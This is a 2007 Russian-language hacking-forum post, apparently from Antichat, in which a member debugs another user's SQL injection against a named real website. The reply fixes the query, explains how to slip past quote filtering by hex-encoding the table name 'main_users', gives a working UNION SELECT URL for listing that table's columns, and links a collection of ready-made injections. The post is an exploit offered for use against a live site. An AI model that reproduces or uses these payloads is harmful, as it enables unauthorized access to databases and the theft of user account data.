27.08.2007, 22:16
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от noisia
http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA .COLUMNS+where+table_name=main_users+limit+1,1/*
почему??
SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'
1) Ты ошибся, смотри ты написал INF ROMATION_SCHEMA.COLUMNS, а надо INF ORMATION_SCHEMA.COLUMNS
2) Делать надо не так: table_name=main_users, а так: table_name='main_users', т.е. писать в кавычках.
3) Но здесь кавычки фильтруются, но это легко обойти, написав название таблицы в хексах: 0x6d61696e5f7573657273
В итоге должно выглядить так:
Код:
http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=0x6d61696e5f7573657273+limit+0,1/*
P.S. Эта инъекция уже выкладывалась, юзай антибоян:
http://antiboyansql.narod.ru/sql.txt
Последний раз редактировалось Grey; 28.08.2007 в 00:27..
|
|
|